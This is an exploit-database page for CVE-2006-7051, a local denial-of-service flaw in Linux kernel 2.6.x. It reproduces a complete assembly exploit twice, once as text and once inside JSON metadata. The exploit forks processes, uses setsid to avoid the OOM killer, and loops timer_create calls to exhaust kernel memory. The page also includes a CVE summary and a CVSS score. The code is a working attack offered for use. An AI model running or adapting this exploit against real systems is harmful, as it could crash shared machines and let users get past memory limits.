Search...

Linux Kernel 2.6.x - sys_timer_create Local Denial of Service Exploit

2006-04-09T00:00:00

ID EDB-ID:1657
Type exploitdb
Reporter fingerout
Modified 2006-04-09T00:00:00

Description

Linux Kernel 2.6.x sys_timer_create() Local Denial of Service Exploit. CVE-2006-7051. Dos exploit for linux platform

                                        
                                            ;nasm -f elf noHeaven.asm
;ld -s -o noHeaven noHeaven.o

section .text
   global _start

count   equ     8       ; threads count - do it quicker

_start:
       mov     ebx, count
       call    create_threads
       jmp     done
_pause:
       mov     eax,29
       int     0x80
       ret
create_threads:
       mov     eax,2
       int     0x80
       test    eax,eax
       jz      consume
       dec     ebx
       test    ebx,ebx
       jnz     create_threads
       ret
consume:
setsid:         ;       so we won't get counted as one thread in oom_killer()
       xor     ebx,ebx ;       each task will have about 20 oom_score which
       mov     eax,66 ;        is less than 'init' and others
       int     0x80
       push    eax
loopek:
       mov     eax,259
       mov     ebx,0
       mov     ecx,0
       mov     edx,esp
       int     0x80
       jmp     loopek
done:
       xor     ebx,ebx
       mov     eax,1
       int     0x80

; milw0rm.com [2006-04-09]

JSON Vulners Source

Initial Source

{"bulletinFamily": "exploit", "id": "EDB-ID:1657", "cvelist": ["CVE-2006-7051"], "modified": "2006-04-09T00:00:00", "lastseen": "2016-01-31T14:37:54", "edition": 1, "sourceData": ";nasm -f elf noHeaven.asm\n;ld -s -o noHeaven noHeaven.o\n\nsection .text\n global _start\n\ncount equ 8 ; threads count - do it quicker\n\n_start:\n mov ebx, count\n call create_threads\n jmp done\n_pause:\n mov eax,29\n int 0x80\n ret\ncreate_threads:\n mov eax,2\n int 0x80\n test eax,eax\n jz consume\n dec ebx\n test ebx,ebx\n jnz create_threads\n ret\nconsume:\nsetsid: ; so we won't get counted as one thread in oom_killer()\n xor ebx,ebx ; each task will have about 20 oom_score which\n mov eax,66 ; is less than 'init' and others\n int 0x80\n push eax\nloopek:\n mov eax,259\n mov ebx,0\n mov ecx,0\n mov edx,esp\n int 0x80\n jmp loopek\ndone:\n xor ebx,ebx\n mov eax,1\n int 0x80\n\n; milw0rm.com [2006-04-09]\n", "published": "2006-04-09T00:00:00", "href": "https://www.exploit-db.com/exploits/1657/", "osvdbidlist": ["40963"], "reporter": "fingerout", "hash": "6bb14b1b28bbe3490e31d2e7f34708e2af3b33c615a2142a42ba147a3df07da9", "title": "Linux Kernel 2.6.x - sys_timer_create Local Denial of Service Exploit", "history": [], "type": "exploitdb", "objectVersion": "1.0", "description": "Linux Kernel 2.6.x sys_timer_create() Local Denial of Service Exploit. CVE-2006-7051. Dos exploit for linux platform", "references": [], "cvss": {"score": 4.9, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/1657/", "enchantments": {"vulnersScore": 2.1}}

{"result": {"cve": [{"id": "CVE-2006-7051", "type": "cve", "title": "CVE-2006-7051", "description": "The sys_timer_create function in posix-timers.c for Linux kernel 2.6.x allows local users to cause a denial of service (memory consumption) and possibly bypass memory limits or cause other processes to be killed by creating a large number of posix timers, which are allocated in kernel memory but are not treated as part of the process' memory.", "published": "2007-02-23T19:28:00", "cvss": {"score": 4.9, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-7051", "cvelist": ["CVE-2006-7051"], "lastseen": "2017-10-11T11:06:55"}]}}